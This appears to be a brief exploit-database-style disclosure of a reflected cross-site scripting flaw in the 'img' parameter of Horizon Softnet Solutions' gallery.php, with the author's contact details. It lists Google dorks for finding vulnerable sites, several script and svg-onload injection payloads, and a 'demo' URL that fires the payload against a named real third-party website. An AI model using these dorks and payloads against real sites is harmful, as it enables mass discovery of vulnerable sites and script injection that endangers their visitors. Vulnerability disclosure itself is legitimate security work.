[+] Title: Horizon Softnet Solutions Cross Site Scripting (XSS)
[+] date: 2021-01-26
[+] Author: h4shur
[+] Vendor Homepage: https://www.horizonsoftnet.com/
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: /gallery.php?img=
[+] Vulnerable Parameter: Get Method
[+] Dork: intext:"Powered by Horizon Softnet Solutions."
intext:"Powered by Horizon Softnet Solutions." inurl:"/gallery.php?img="
### POC:
[+} site.com/gallery.php?img=
### Xss Alert Code: "><script>alert()</script>
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
And Etc.
### Demo:
[+] http://goyalmarbles.com/gallery.php?img=%22%3E%3Cscript%3Ealert(%27hh%27)%3C/script%3E
### thanks to :
* s433d3h
### Contact Me :
* Email : h4shursec@gmail.com
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @netedit0r